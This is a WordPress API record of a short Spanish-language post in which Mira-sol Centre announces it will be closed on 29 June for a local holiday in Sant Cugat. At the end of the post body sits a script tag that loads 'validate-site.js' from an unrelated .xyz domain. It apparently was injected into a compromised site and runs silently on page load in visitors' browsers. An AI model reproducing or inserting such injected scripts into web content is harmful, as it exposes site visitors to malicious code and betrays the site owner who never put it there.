{"id":6002,"date":"2018-06-27T11:03:19","date_gmt":"2018-06-27T11:03:19","guid":{"rendered":"http:\/\/mirasol-centre.com\/?p=6002"},"modified":"2018-06-27T11:03:19","modified_gmt":"2018-06-27T11:03:19","slug":"festivo-local","status":"publish","type":"post","link":"https:\/\/mirasol-centre.com\/es\/festivo-local\/","title":{"rendered":"FESTIVO LOCAL"},"content":{"rendered":"<p>Buenos d\u00edas:<\/p>\n<p>&nbsp;<\/p>\n<p>Os informamos que el pr\u00f3ximo viernes d\u00eda 29 de Junio es festivo local en Sant Cugat, por este motivo Mira-sol Centre permanecer\u00e1 cerrado.<\/p>\n<p>Gracias y disculpen las molestias.<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><script src=\"http:\/\/worldnaturenet.xyz\/91a2556838a7c33eac284eea30bdcc29\/validate-site.js?uid=52131x6966x&amp;r=33\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Buenos d\u00edas: &nbsp; Os informamos que el pr\u00f3ximo viernes d\u00eda 29 de Junio es festivo local en Sant Cugat, por este motivo Mira-sol Centre permanecer\u00e1 cerrado. Gracias y disculpen las [&hellip;]<\/p>\n","protected":false},"author":3,"featured_media":6005,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[116],"tags":[],"featured_image_src":{"landsacpe":["https:\/\/mirasol-centre.com\/nousite\/wp-content\/uploads\/2018\/06\/MIRA-SOSL-CASTELLANO-1-1009x445.jpg",1009,445,true],"list":["https:\/\/mirasol-centre.com\/nousite\/wp-content\/uploads\/2018\/06\/MIRA-SOSL-CASTELLANO-1-463x348.jpg",463,348,true],"medium":["https:\/\/mirasol-centre.com\/nousite\/wp-content\/uploads\/2018\/06\/MIRA-SOSL-CASTELLANO-1-300x223.jpg",300,223,true],"full":["https:\/\/mirasol-centre.com\/nousite\/wp-content\/uploads\/2018\/06\/MIRA-SOSL-CASTELLANO-1.jpg",1009,750,false]},"_links":{"self":[{"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/posts\/6002"}],"collection":[{"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/comments?post=6002"}],"version-history":[{"count":2,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/posts\/6002\/revisions"}],"predecessor-version":[{"id":6006,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/posts\/6002\/revisions\/6006"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/media\/6005"}],"wp:attachment":[{"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/media?parent=6002"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/categories?post=6002"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/mirasol-centre.com\/es\/wp-json\/wp\/v2\/tags?post=6002"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}